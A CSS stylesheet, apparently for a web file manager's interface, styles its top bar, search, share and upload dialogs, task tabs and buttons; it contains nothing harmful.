textarea,input,button,pre { font-family: 'Helvetica Neue', "Microsoft Yahei", "微软雅黑", "STXihei", "WenQuanYi Micro Hei", sans-serif; -khtml-user-select: text; -webkit-user-select: text; -moz-user-select: text; -ms-user-select: text; -o-user-select: text; user-select: text;}
.content_box .ace_cjk { width: 1em !important;}
.content_box .ace_static_highlight { font-size: 13px;}
*,*:before,*:after { -webkit-box-sizing: inherit; -moz-box-sizing: inherit; box-sizing: inherit;}
label { font-weight: normal;}
pre { border: none; border-radius: 0;}
.btn .font-icon { color: #999;}
.btn-group-sm>.btn { padding: 4px 10px; line-height: 13px; line-height: 1;}
.btn-default:active,.btn-default.active { border-color: #ADADAD; color: #888;}
.dropdown-menu:after { content: ''; display: inline-block; border-left: 6px solid rgba(0,0,0,0); border-right: 6px solid rgba(0,0,0,0); border-bottom: 6px solid #FFF; position: absolute; top: -6px; right: 10px;}
.dropdown-menu:before { content: ''; left: auto; right: 12px; display: inline-block; position: absolute; border-left: 7px solid rgba(0,0,0,0); border-right: 7px solid rgba(0,0,0,0); top: -7px; border-bottom: 7px solid #CCC; border-bottom-color: rgba(0,0,0,0.2); right: 9px;}
h1,h2,h3,h4,h5,.h1,.h2,.h3,.h4,.h5 { font-family: 'Helvetica Neue', "Microsoft Yahei", "微软雅黑", "STXihei", "WenQuanYi Micro Hei", sans-serif;}
.pl-5 { padding-left: 5px;}
.pr-5 { padding-right: 5px;}
.pl-10 { padding-left: 10px;}
.pr-10 { padding-right: 10px;}
.ml-5 { margin-left: 5px;}
.mr-5 { margin-right: 5px;}
.ml-10 { margin-left: 10px;}
.mr-10 { margin-right: 10px;}
.aui_buttons button { font-size: 13px; -khtml-user-select: none; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;}
ul.dropdown-menu { border: 1px solid rgba(0,0,0,0.05); box-shadow: 0 4px 30px rgba(0,0,0,0.15);}
ul.dropdown-menu a:hover,ul.dropdown-menu .this a { transition: all 0.2s;}
.context-menu-list span b { display: inline-block; font-size: 10px; position: absolute; right: 10px; font-weight: 400; color: #ddd; width: 65px; text-align: right; overflow: hidden;}
.context-menu-list .hover span b { color: #fff;}
.context-menu-list .context-menu-item.line_top { border-top: 1px solid #ddd !important;}
.context-menu-list .context-menu-item.disabled { color: #ccc !important;}
input { border: 1px solid #ddd; background: #fff; outline: none;}
input[type="radio"],input[type="checkbox"] { border: none; background: none;}
.topbar { width: 100%; height: 40px; color: #ddd; z-index: 100; top: 0; background: #03B3B2; position: fixed;}
.topbar .content { padding: 0px; line-height: 40px; height: 40px; wordbreak: break-all;}
.topbar .content i { display: inline-block; padding-right: 10px; font-size: 1.1em;}
.topbar .content .topbar_menu { display: block; text-decoration: none; color: #fff; border: 1px solid #03cccb; height: 40px; overflow: hidden; -webkit-transition: all 0.2s; -moz-transition: all 0.2s; -o-transition: all 0.2s; -ms-transition: all 0.2s; transition: all 0.2s; padding: 0px 1.2em; border-top: none; border-bottom: none; outline: none; float: left; margin-left: -1px; font-size: 14px;}
.topbar .content .topbar_menu:hover,.topbar .content .topbar_menu.this { background: #04d1d0;}
.topbar .content .topbar_menu.title { font-size: 20px; width: 200px; width: 202px\0; padding: 0; text-align: center;}
.topbar .content .topbar_menu.title:hover { background: none;}
.topbar .content .menu-desktop:before { content: "\f108";}
.topbar .content .menu-explorer:before { content: "\f0ae";}
.topbar .content .menu-editor:before { content: "\f044";}
.topbar .content .top_left { overflow: hidden; height: 40px; width: 70%;}
.topbar .content .top_left .font-icon { font-family: FontAwesome; font-style: normal;}
.topbar .content .top_right { position: absolute; right: 0px; top: 0px; margin-right: 0px; height: 40px;}
.topbar .content .top_right .menu_group { display: inline-block; height: 40px; position: relative; margin-left: -4px;}
.topbar .content .top_right .topbar_menu { display: inline-block; padding: 0px 6px;}
.topbar .content .top_right .topbar_menu i { padding-right: 3px;}
.topbar .content .top_right .btn { color: #fff;}
.topbar .content .top_right ul a { color: #666; line-height: 30px; height: 30px; display: block; padding: 0px 1.7em; border: none; overflow: hidden;}
.topbar .content .top_right ul a:hover,.topbar .content .top_right ul a.this { background: #e6e6e6; color: #000; margin-right: 0px;}
.topbar .content .top_right ul .font-icon { width: 18px; display: inline-block;}
.topbar .content .share_title { text-align: center; color: #fff; float: left; margin-left: 8px; margin-right: 7px;}
.topbar .content .share_title_info { color: #fff; font-size: 16px; background: #eee; background: rgba(0,0,0,0.2); border-radius: 4px; padding: 6px;}
.topbar .content .share_info { color: #fff; float: left; font-size: 12px;}
.topbar .content .share_info .time { padding-left: 5px; color: #fff; padding-right: 8px;}
.topbar .content .top_right div.share_info_user { margin-right: 10px; color: #fff; position: relative; top: -16px;}
.topbar .content .top_right div.share_info_user .btn_download,.topbar .content .top_right div.share_info_user .btn.button_my_share { padding: 4px 20px; margin-left: 5px;}
.topbar .content .top_right div.share_info_user .dropdown-toggle { height: 16px;}
.common_footer { position: fixed; bottom: 0px; background: #f8f8f8; color: #999; font-size: 13px; width: 100%; text-align: center; border-top: 1px solid #e8e8e8; height: 31px; line-height: 32px; overflow: hidden;}
.common_footer .copyright_bottom { cursor: pointer; font-size: 16px; color: #aaa; text-decoration: none;}
.common_footer .copyright_bottom:hover { color: #f60; border-bottom: none;}
.do_search { color: #888; min-width: 452px;}
.do_search .search_header { padding: 10px; padding-bottom: 0px;}
.do_search .search_header input[type='checkbox'] { padding-left: 10px;}
.do_search .search_header label { font-size: 13px;}
.do_search .search_header .icon-search { font-size: 16px; margin-left: -8px; cursor: pointer; padding-top: 3px; padding-bottom: 5px;}
.do_search .search_header .s_br { margin-bottom: 8px; line-height: 25px;}
.do_search .search_header #search_value,.do_search .search_header #search_path,.do_search .search_header #search_ext { height: 23px; height: 27px\0; border: 1px solid #ddd; background: #fff; outline: none; box-shadow: inset 0 1px 1px rgba(0,0,0,0.08); -webkit-transition: all ease-in-out .2s; -moz-transition: all ease-in-out .2s; -o-transition: all ease-in-out .2s; -ms-transition: all ease-in-out .2s; transition: all ease-in-out .2s; width: 125px; padding-left: 10px; padding-right: 10px; margin-left: 5px;}
.do_search .search_header #search_value:focus,.do_search .search_header #search_path:focus,.do_search .search_header #search_ext:focus { border-color: #75A1F0; outline: none; box-shadow: 0 0 12px #75A1F0;}
.do_search .search_header #search_value { width: 168px; margin: 0; padding: 2px 5px 0px 5px; padding-top: 1px\0;}
.do_search .search_result { margin: 10px; border: 1px solid #ddd; height: 350px; font-size: 12px; overflow-y: auto; overflow-x: hidden;}
.do_search .search_result table { width: 100%; table-layout: fixed;}
.do_search .search_result table tr { background: #fff; cursor: default; color: #666;}
.do_search .search_result table tr a { text-decoration: none; color: #5275b4;}
.do_search .search_result table tr a:hover { border-bottom: 1px solid #5275b4;}
.do_search .search_result table tr td { border-right: 1px solid #eee; border-bottom: 1px solid #eee; padding: 4px; overflow: hidden; word-break: keep-all; white-space: nowrap; text-overflow: ellipsis;}
.do_search .search_result table tr.message td { height: 40px; line-height: 30px; font-size: 15px; color: #5275b4; text-align: center;}
.do_search .search_result table tr.message td:hover { background: #fff; color: #5275b4;}
.do_search .search_result table .search_title td { background: #eee; border-bottom: 1px solid #ddd; border-right: 1px solid #ddd;}
.do_search .search_result table .type,.do_search .search_result table .search_result .name,.do_search .search_result table .search_result .size,.do_search .search_result table .search_result .path { padding-left: 5px;}
.do_search .search_result table .name { width: 30%;}
.do_search .search_result table .type { width: 37px;}
.do_search .search_result table .size { width: 50px;}
.do_search .search_result table .path,.do_search .search_result table .search_title .path { border-right: none;}
.task_tab { position: fixed; bottom: 1px; left: 0; width: 100%; height: 30px; z-index: 9900; padding-left: 50px; background: rgba(0,0,0,0.1); border-top: 1px solid rgba(0,0,0,0.15); color: #444;}
.task_tab .tabs { height: 100%; margin-right: 10px; margin-right: 60px;}
.task_tab .tabs .tab { float: left; height: 100%; margin-right: 2px; box-shadow: 0 0 6px #666; white-space: nowrap; text-overflow: ellipsis; -khtml-user-select: none; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none; width: 110px; border: 1px solid rgba(255,255,255,0.4); line-height: 30px; border-radius: 3px; cursor: default; overflow: hidden; font-size: 13px; padding-left: 4px; word-break: break-all; background: rgba(255,255,255,0); background-image: -webkit-linear-gradient(top,rgba(255,255,255,0.4),rgba(255,255,255,0)); background-image: -moz-linear-gradient(top,rgba(255,255,255,0.4),rgba(255,255,255,0)); background-image: -o-linear-gradient(top,rgba(255,255,255,0.4),rgba(255,255,255,0)); background-image: -ms-linear-gradient(top,rgba(255,255,255,0.4),rgba(255,255,255,0)); background-image: linear-gradient(top,rgba(255,255,255,0.4),rgba(255,255,255,0));}
.task_tab .tabs .tab img { width: 18px; height: 18px; padding-right: 4px; vertical-align: middle; display: inline-block; margin-top: -3px; border-radius: 4px;}
.task_tab .tabs .tab.hover { background: rgba(255,255,255,0); background-image: -webkit-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0)); background-image: -moz-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0)); background-image: -o-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0)); background-image: -ms-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0)); background-image: linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));}
.task_tab .tabs .tab.this { box-shadow: 0 0 6px #000; background: rgba(255,255,255,0.2); background-image: -webkit-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0.2)); background-image: -moz-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0.2)); background-image: -o-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0.2)); background-image: -ms-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0.2)); background-image: linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0.2));}
.tasktab-dragging { position: absolute; z-index: 99999; height: 30px; bottom: 0px; width: 110px; border: 1px solid rgba(255,255,255,0.4); line-height: 30px; box-shadow: 0 0 6px #000; padding-left: 4px; border-radius: 3px; cursor: default; overflow: hidden; font-size: 13px; word-break: break-all; background: rgba(255,255,255,0.2); background-image: -webkit-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2)); background-image: -moz-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2)); background-image: -o-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2)); background-image: -ms-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2)); background-image: linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));}
.tasktab-dragging img { width: 18px; height: 18px; padding-right: 4px; vertical-align: middle; display: inline-block; margin-top: -3px; border-radius: 4px;}
.init_loading { position: fixed; left: 45%; top: 40%; font-size: 15px; z-index: 999999; width: auto;}
.init_loading div { padding: 20px; background: #000; opacity: 0.6; filter: alpha(opacity=60); margin: 0 auto; color: #FFF; border-radius: 6px; text-align: center; line-height: 30px;}
.init_loading img { border-radius: 30px;}
.appbox { font-size: 13px; font-family: "微软雅黑"; overflow: hidden;}
.appbox .appline { width: 100%; margin-bottom: 5px; line-height: 25px; overflow: hidden;}
.appbox .appline .left { float: left; width: 80px;}
.appbox .appline .right { float: left;}
.appbox .appline input { margin-right: 5px;}
.appbox .appline label { display: inline-block; margin-left: -10px; padding: 0 5px;}
.appbox .appline input[type=text],.appbox .appline textarea { width: 200px; padding: 2px 5px; border: 1px solid #ddd; background: #fff; outline: none; box-shadow: inset 0 1px 1px rgba(0,0,0,0.08); -webkit-transition: all ease-in-out .2s; -moz-transition: all ease-in-out .2s; -o-transition: all ease-in-out .2s; -ms-transition: all ease-in-out .2s; transition: all ease-in-out .2s; height: 24px;}
.appbox .appline input[type=text]:focus,.appbox .appline textarea:focus { border-color: #75A1F0; outline: none; box-shadow: 0 0 12px #75A1F0;}
.appbox .appline input[type=text].w30 { width: 30px;}
.appbox .appline input[type=text].w20 { width: 20px;}
.appbox .appline textarea { height: 100px; width: 300px;}
.appbox .icon input { width: 150px;}
.appbox .icon a { padding: 2px 4px; top: 0px; border: 1px solid #CCC;}
.appbox .icon a.open { margin-left: 5px;}
.appbox .icon a img { width: 20px; height: 20px;}
#body div.app_list { position: absolute; left: 150px; width: initial; margin: 15px 0 20px 15px; right: 20px; padding-bottom: 60px;}
#body div.app_list .app-list { margin-top: 10px; border-top: 1px solid #ddd;}
#body div.app_list .app-list .app_li { float: left; width: 150px; height: 190px; border: 1px solid #e6e6e6; margin: 20px 20px 0 0; list-style: none; border-radius: 3px; box-shadow: 0 2px 7px #f0f0f0;}
#body div.app_list .app-list .app_li:hover { box-shadow: 0 5px 20px #ddd;}
#body div.app_list .app-list .app_li a.button { margin: 0;}
#body div.app_list .app-list .app_li a.icon { float: left; width: 100%; background: #eee; text-align: center; padding: 8px 0;}
#body div.app_list .app-list .app_li a.icon img { width: 64px; height: 64px; border-radius: 10px; box-shadow: 0 0 10px #999;}
#body div.app_list .app-list .app_li p { width: 100%; text-align: center; margin: 0; color: #666; height: 53px; overflow: hidden;}
#body div.app_list .app-list .app_li p span { display: block; word-break: break-all;}
#body div.app_list .app-list .app_li p span.title { font-size: 16px; font-weight: 800; line-height: 33px; height: 33px;}
#body div.app_list .app-list .app_li .btn-group { margin-left: 15px; margin-top: 7px; text-align: center;}
#body div.app_list .app-list .app_li .btn-group .btn-default { width: 95px;}
#body div.app_list .app-list .app_li .btn-group .btn:first-child:not(:last-child):not(.dropdown-toggle) { height: 17px; width: 70px; height: 30px\0;}
#body div.app_list .app-list .app_li .btn-group .btn+.dropdown-toggle { height: 17px; color: #aaa; height: 30px\0; width: 8px;}
#body div.app_list .app-list .app_li .btn-group .dropdown-menu { margin-left: 15px; min-width: 100px;}
.copyright_dialog.dialog-simple .aui_header { background: transparent; opacity: 1; filter: alpha(opacity=100);}
.copyright_dialog.dialog-simple .aui_titleBar { bottom: 0px;}
.copyright_dialog.dialog-simple .aui_inner { border: none; background: none;}
.copyright_dialog.dialog-simple .aui_title { opacity: 0.01; filter: alpha(opacity=1); height: 150px; width: 410px; margin-bottom: -120px; position: absolute; z-index: 10;}
.copyright_dialog.dialog-simple .aui_min,.copyright_dialog.dialog-simple .aui_max { display: none;}
.copyright_dialog.dialog-simple .aui_nw,.copyright_dialog.dialog-simple .aui_ne { height: 0px;}
.copyright_dialog.dialog-simple .aui_close { border-radius: 12px; opacity: 0.4; filter: alpha(opacity=40); margin-top: 3px; margin-right: 3px; z-index: 999;}
.copyright_dialog .aui_footer { display: none;}
.copyright_dialog .copyright_dialog_content { -webkit-box-shadow: 0px 10px 60px rgba(0,0,0,0.4); -moz-box-shadow: 0px 10px 60px rgba(0,0,0,0.4); box-shadow: 0px 10px 60px rgba(0,0,0,0.4); width: auto; border-radius: 3px; padding-bottom: 30px; background: #fff; background: rgba(255,255,255,0.9); border: 1px solid #ccc \9;}
.copyright_dialog .copyright_dialog_content .title { width: 100%; background: #6699cc url("../../../images/login.png"); height: 150px; padding-top: 0px; border-top-left-radius: 3px; border-top-right-radius: 3px;}
.copyright_dialog .copyright_dialog_content .title .logo { text-align: center; font-size: 35px; width: 100%; padding-top: 40px; color: #fff; -webkit-box-reflect: below -20px -webkit-gradient(linear,left top,left bottom,from(transparent),to(rgba(255,255,255,0.2))); font-weight: lighter;}
.copyright_dialog .copyright_dialog_content .title .logo i { color: #aaddff; font-weight: 400; margin-right: 10px;}
.copyright_dialog .copyright_dialog_content .title .info { text-align: right; font-size: 14px; color: #aaddff; padding-right: 14px; padding-top: 30px;}
.copyright_dialog .copyright_dialog_content .content { padding: 20px;}
.copyright_dialog .copyright_dialog_content .content p { text-indent: 2em; color: #333; margin-bottom: 30px;}
.copyright_dialog .copyright_dialog_content .content a { padding-right: 5px;}
.copyright_dialog .copyright_dialog_content .content div { text-align: center; padding-bottom: 5px;}
.share_dialog.dialog-simple .aui_header { background: transparent; opacity: 1; filter: alpha(opacity=100);}
.share_dialog.dialog-simple .aui_titleBar { bottom: 0px;}
.share_dialog.dialog-simple .aui_nw,.share_dialog.dialog-simple .aui_ne { height: 0px;}
.share_dialog.dialog-simple .aui_inner { border: none; background: none;}
.share_dialog.dialog-simple .aui_title { opacity: 0.01; filter: alpha(opacity=1); height: 120px; margin-bottom: -120px;}
.share_dialog.dialog-simple .aui_min,.share_dialog.dialog-simple .aui_max { display: none;}
.share_dialog.dialog-simple .aui_close { border-radius: 12px; top: 6px; opacity: 0.4; filter: alpha(opacity=40);}
.share_dialog .aui_footer { display: none;}
.share_dialog .content_box { -webkit-box-shadow: 0 5px 30px rgba(0,0,0,0.5); -moz-box-shadow: 0 5px 30px rgba(0,0,0,0.5); box-shadow: 0 5px 30px rgba(0,0,0,0.5); border-radius: 5px; background: #fff; border: 1px solid #ccc \9; width: auto;}
.share_dialog .content_box .title { width: 100%; color: #fff; height: 120px; border-radius: 5px 5px 0 0; background: #6699cc url('../../../images/login.png');}
.share_dialog .content_box .titleinfo { text-align: center; font-size: 40px; line-height: 120px; font-weight: lighter;}
.share_dialog .content_box .share_view_info { width: 200px; margin: 0 auto; margin-top: -33px; padding: 2px 5px; text-align: center; border-radius: 17px; background: #888; background: rgba(0,0,0,0.2);}
.share_dialog .content_box .content_info { padding: 15px;}
.share_dialog .content_box .content_info .input_line { margin: 10px 0 10px 0;}
.share_dialog .content_box .content_info .input_line .input_title { display: block; width: 80px; line-height: 35px; font-size: 14px; overflow: hidden; float: left; padding-right: 10px; text-align: right;}
.share_dialog .content_box .content_info .input_line input[type="text"] { border: 1px solid #ddd; background: #fff; outline: none; box-shadow: inset 0 1px 1px rgba(0,0,0,0.08); -webkit-transition: all ease-in-out .2s; -moz-transition: all ease-in-out .2s; -o-transition: all ease-in-out .2s; -ms-transition: all ease-in-out .2s; transition: all ease-in-out .2s; line-height: 28px; padding: 2px 5px; width: 150px; margin-right: 5px; float: left; height: 28px; border-radius: 3px;}
.share_dialog .content_box .content_info .input_line input[type="text"]:focus { border-color: #75A1F0; outline: none; box-shadow: 0 0 12px #75A1F0;}
.share_dialog .content_box .content_info .input_line label { margin-top: 8px; margin-right: 20px;}
.share_dialog .content_box .content_info .input_line label input { height: 13px; margin-right: 5px;}
.share_dialog .content_box .content_info .input_line i { font-size: 12px; color: #bbb; line-height: 35px; font-style: normal;}
.share_dialog .content_box .content_info .input_line #share_name { width: 220px; margin-right: 10px;}
.share_dialog .content_box .content_info .input_line .share_url { margin-right: 0; border-radius: 3px 0 0 3px; width: 220px !important;}
.share_dialog .content_box .content_info .input_line .share_more { line-height: 33px;}
.share_dialog .content_box .content_info .input_line .input-group-btn { float: left;}
.share_dialog .content_box .content_info .input_line .dropdown-toggle { margin-left: -5px; border-radius: 0 3px 3px 0;}
.share_dialog .content_box .content_info .input_line .open_window { margin-left: -7px; border-radius: 0 4px 4px 0;}
.share_dialog .content_box .content_info .input_line .share_copy { width: 60px; border-radius: 0px; margin-left: -7px;}
.share_dialog .content_box .content_info .share_others { margin: -8px 0 -8px 0;}
.share_dialog .content_box .share_action { border-top: 1px solid #eee; background: #f8f8f8; height: 65px; margin-top: 10px; border-radius: 0 0 4px 4px;}
.share_dialog .content_box .share_action button { float: right; margin: 15px 25px; outline: 0;}
.share_dialog .content_box .share_action .share_remove_button { float: right; margin-top: 23px; margin-right: -10px; color: #999;}
.share_dialog .content_box .share_action .share_remove_button:hover { color: #f30;}
.fileList_icon .file { position: relative;}
.fileList_icon .file .download { position: absolute; bottom: 4px; margin-left: 45px; opacity: 0.5; filter: alpha(opacity=50);}
.fileList_icon .file .download .btn { font-size: 15px; padding: 0; display: block; border-radius: 18px; height: 30px; line-height: 30px; width: 30px; color: #aaa;}
.fileList_list .file { position: relative;}
.fileList_list .file .download { position: absolute; bottom: -2px; margin-left: 45px; left: 180px; z-index: 99; opacity: 0.5; filter: alpha(opacity=50);}
.fileList_list .file .download .btn { font-size: 15px; padding: 0; display: block; border-radius: 18px; height: 28px; line-height: 28px; width: 28px; color: #aaa;}
.url_link input { border: 1px solid #ddd; background: #fff; line-height: 30px; height: 30px; width: 300px; margin-bottom: 15px; padding: 0 5px;}
.aui_content .ajaxError { -khtml-user-select: text; -webkit-user-select: text; -moz-user-select: text; -ms-user-select: text; -o-user-select: text; user-select: text; color: #f60; position: absolute; left: 0px; right: 0px; bottom: 0px; top: 40px; overflow: auto; padding: 10px;}
.pathinfo { font-size: 13px; width: 330px; min-height: 300px; padding: 15px 0 15px 0; color: #446;}
.pathinfo .line { width: 95%; margin: 8px auto 8px auto; height: 0px; border-bottom: 1px solid #ccc;}
.pathinfo .download_url { padding: 4px 5px; width: 100%; line-height: 20px; height: 24px;}
.pathinfo .p { margin-left: 6px; margin-bottom: 2px;}
.pathinfo .p .icon { width: 40px; height: 40px; float: left; border: 1px solid #f6f6f6; margin-left: 10px;}
.pathinfo .p .file_icon { background: url("../../../images/file.png") 5px 4px no-repeat;}
.pathinfo .p .folder_icon { background: url("../../../images/folder.png") 5px 4px no-repeat;}
.pathinfo .p input.info_name { padding: 2px; padding-left: 10px; border: 1px solid #ddd; background: #fff; outline: none; box-shadow: inset 0 1px 1px rgba(0,0,0,0.08); -webkit-transition: all ease-in-out .2s; -moz-transition: all ease-in-out .2s; -o-transition: all ease-in-out .2s; -ms-transition: all ease-in-out .2s; transition: all ease-in-out .2s; height: 25px; line-height: 25px; width: 200px; float: left; display: block; margin: 10px 0 0 43px;}
.pathinfo .p input.info_name:focus { border-color: #75A1F0; outline: none; box-shadow: 0 0 12px #75A1F0;}
.pathinfo .p input.info_chmod { padding: 5px 10px; width: 55px; color: #999; margin-right: 10px; display: inline-block; height: 18px; line-height: 17px;}
.pathinfo .p .title { width: 80px; float: left; color: #333; margin-left: 15px; font-weight: 800; color: #444;}
.pathinfo .p .content { float: left; width: 210px; word-break: break-all; color: #666; -khtml-user-select: text; -webkit-user-select: text; -moz-user-select: text; -ms-user-select: text; -o-user-select: text; user-select: text;}
.pathinfo input { border: 1px solid #ddd; background: #fff; outline: none; box-shadow: inset 0 1px 1px rgba(0,0,0,0.08); -webkit-transition: all ease-in-out .2s; -moz-transition: all ease-in-out .2s; -o-transition: all ease-in-out .2s; -ms-transition: all ease-in-out .2s; transition: all ease-in-out .2s; line-height: 28px; padding: 2px 5px; width: 150px; float: left; height: 28px; border-radius: 3px;}
.pathinfo input:focus { border-color: #75A1F0; outline: none; box-shadow: 0 0 12px #75A1F0;}
.pathinfo .download_url { margin-right: 0; border-radius: 3px 0 0 3px;}
.file_drag_upload .aui_content { overflow-y: scroll;}
.fileuploadinfo,.fileupload { color: #555; font-size: 13px;}
.fileuploadinfo { font-size: 18px; color: #5499D9; margin-bottom: 8px; border-bottom: 1px solid #dde; padding-bottom: 6px;}
.fileuploadinfo em { font-size: 12px;}
.fileupload { padding-left: 25px;}
.fileupload span.status { padding-left: 10px; font-size: 10px; color: #f96;}
.file_list { display: none;}
.movie_player_dialog { overflow: hidden;}
.flash_player { width: 100%; height: 100%;}
.wmp_player { width: 0%; height: 0%;}
.movie_player_dialog .aui_content { background: #000;}
.dialog_path_remove .aui_content { width: 260px; word-wrap: break-word;}
.file_upload { height: 385px; padding: 5px; margin-right: 10px; min-width: 365px; overflow: hidden;}
.file_upload .top_nav { border-bottom: 1px solid #ddd; margin-top: 6px;}
.file_upload .menu { display: block; text-decoration: none; float: left; padding: 2px 15px; height: 28px; background: #eee; font-size: 13px; border: 1px solid #ccc; text-align: center; line-height: 25px; margin-right: 5px; margin-bottom: -1px; color: #444;}
.file_upload .menu.this { background: #fff; border-bottom: 1px solid #fff;}
.file_upload .upload_box { margin-top: 10px;}
.file_upload div a.left { margin-left: 10px;}
.file_upload div a.right { position: absolute; right: 5px;}
.file_upload span.info { font-size: 12px; font-style: italic; padding: 0px 0 5px 10px;}
.file_upload i { font-size: 12px; color: #aaa; padding-left: 10px;}
.file_upload .list { margin: 10px 15px;}
.file_upload .list input { margin-left: 10px; width: 190px; padding: 6px 3px; border: 1px solid #ddd; background: #fff; outline: none; box-shadow: inset 0 1px 1px rgba(0,0,0,0.08); -webkit-transition: all ease-in-out .2s; -moz-transition: all ease-in-out .2s; -o-transition: all ease-in-out .2s; -ms-transition: all ease-in-out .2s; transition: all ease-in-out .2s;}
.file_upload .list input:focus { border-color: #75A1F0; outline: none; box-shadow: 0 0 12px #75A1F0;}
.file_upload .submit input { float: right; padding: 4px 20px; background: #ddd; border: none; margin-right: 36px; margin-top: 10px;}
.file_upload .submit input:hover { background: #bbb;}
.file_upload .submit input:active { background: #444; color: #fff;}
.file_upload #uploader { height: 290px; border: 1px solid #ddd; overflow: auto; background: url("../../../images/drop_upload.png") no-repeat center;}
.file_upload #downloader { height: 290px; border: 1px solid #ddd; overflow: auto;}
.file_upload .webuploader-container { position: relative;}
.file_upload .webuploader-element-invisible { position: absolute !important; clip: rect(1px 1px 1px 1px); clip: rect(1px,1px,1px,1px);}
.file_upload .webuploader-pick { position: relative; display: inline-block; line-height: 30px; cursor: pointer; background: #00b7ee; padding: 0px 15px; height: 30px; color: #fff; text-align: center; border-radius: 3px; overflow: hidden;}
.file_upload .webuploader-pick-hover { background: #00a2d4;}
.file_upload .webuploader-pick-disable { opacity: 0.6; pointer-events: none;}
.file_upload .btns { margin-bottom: 10px; font-size: 13px; height: 28px;}
.file_upload .btns .tips { float: right; line-height: 30px;}
.file_upload .btns #picker { width: 100px; float: left;}
.file_upload .upload_box_tips { float: right; line-height: 34px; color: #888;}
.file_upload .upload_box_tips a { text-decoration: none; color: #888;}
.file_upload .upload_box_tips a:hover { color: #428bca; border-bottom: 1px solid #428bca;}
.file_upload .upload_box_config { box-shadow: inset 0px 1px 6px rgba(0,0,0,0.3); border-radius: 2px; margin-bottom: 10px; padding: 4px;}
.file_upload .upload_box_config .upload_check_box { margin-left: 10px;}
.file_upload .upload_box_config label { margin-left: 15px;}
.file_upload .upload_box_config label input { margin-right: 5px;}
.file_upload .uploader-list .success:hover { cursor: pointer; background: #def; border-bottom: 1px solid #3A87AD;}
.file_upload .uploader-list .item { padding: 0px; height: 35px; overflow: hidden; border-bottom: 1px solid #ccc; background: #fefefe;}
.file_upload .uploader-list .item .info { color: #224; line-height: 35px; padding: 0 5px; z-index: 100; position: relative; font-size: 12px;}
.file_upload .uploader-list .item .info span,.file_upload .uploader-list .item .info a { display: block; float: left; text-overflow: ellipsis; height: 30px;}
.file_upload .uploader-list .item .info .title { color: #3A87AD; width: 160px; overflow: hidden; font-weight: 800;}
.file_upload .uploader-list .item .info .size { width: 50px; text-align: center; color: #3A87AD;}
.file_upload .uploader-list .item .info .state { width: 95px; text-align: right;}
.file_upload .uploader-list .item .info .font-icon { margin-left: 12px; font-size: 20px; width: 20px; line-height: 35px; cursor: pointer; color: #bbb;}
.file_upload .uploader-list .item .info .font-icon:hover { text-decoration: none; color: #f60;}
.file_upload .uploader-list .item .info .icon-ok { color: #40AA53;}
.file_upload .uploader-list .item .info .error { color: #f30; overflow: hidden;}
.file_upload .uploader-list .item .progress { height: 38px; margin: 0px; width: 100%; float: left; margin-top: -30px; border-radius: 0; box-shadow: none;}
.file_upload .uploader-list .item .progress-bar { background-color: #abd7fb; background-image: linear-gradient(45deg,rgba(255,255,255,0.35) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.35) 50%,rgba(255,255,255,0.35) 75%,transparent 75%,transparent);}
a.button { color: #888; font-size: 12px; font-weight: 800; text-decoration: none; padding: 4px 10px; position: relative; display: inline-block; text-shadow: 0 1px 0 #fff; -webkit-transition: border-color .218s; -moz-transition: border .218s; -o-transition: border-color .218s; transition: border-color .218s; border: solid 1px #ddd; -moz-box-shadow: 0 2px 8px rgba(0,0,0,0.05); -webkit-box-shadow: 0 2px 8px rgba(0,0,0,0.05); box-shadow: 0 2px 8px rgba(0,0,0,0.05); border-radius: 2px; -webkit-border-radius: 2px; -moz-border-radius: 2px; background: url("../../../images/buttons_40.png") 0 0px repeat-x; margin: 0 0 0 -6px;}
a.left { -webkit-border-top-right-radius: 0; -moz-border-radius-topright: 0; border-top-right-radius: 0; -webkit-border-bottom-right-radius: 0; -moz-border-radius-bottomright: 0; border-bottom-right-radius: 0; border-right: solid 1px #ddd;}
a.middle { position: relative; border-radius: 0; -webkit-border-radius: 0; -moz-border-radius: 0; border-left: solid 1px #ddd;}
a.right { -webkit-border-top-left-radius: 0; -moz-border-radius-topleft: 0; border-top-left-radius: 0; -webkit-border-bottom-left-radius: 0; -moz-border-radius-bottomleft: 0; border-bottom-left-radius: 0; border-left: solid 1px #ddd;}
a.button:hover { background: #eee url("../../../images/buttons_40.png") 0 -12px repeat-x; color: #333; border-color: #999; -moz-box-shadow: 0 1px 10px rgba(0,0,0,0.2); -webkit-box-shadow: 0 1px 10px rgba(0,0,0,0.2); box-shadow: 0 1px 10px rgba(0,0,0,0.2);}
a.left:hover,a.middle:hover { margin-right: 1px; padding-right: 9px;}
a.button:active { color: #000; border-color: #444;}
a.button:focus { outline: none;}
.messageBox { position: absolute; top: 15%; left: 0px; z-index: 88; background: #03B3B2; color: #fff; opacity: 0.7; filter: alpha(opacity=70); -webkit-border-radius: 1px; -moz-border-radius: 1px; border-radius: 1px; -webkit-box-shadow: 0 10px 60px rgba(0,0,0,0.6); -moz-box-shadow: 0 10px 60px rgba(0,0,0,0.6); box-shadow: 0 10px 60px rgba(0,0,0,0.6); display: none;}
.messageBox .content { padding: 10px 30px; line-height: 20px; width: auto;}
.dialogMax { z-index: 99999 !important;}
.aui_outer { text-align: left; position: relative;}
.aui_mask { position: absolute; width: 100%; height: 100%; background: #fff; opacity: 0.05; filter: alpha(opacity=5);}
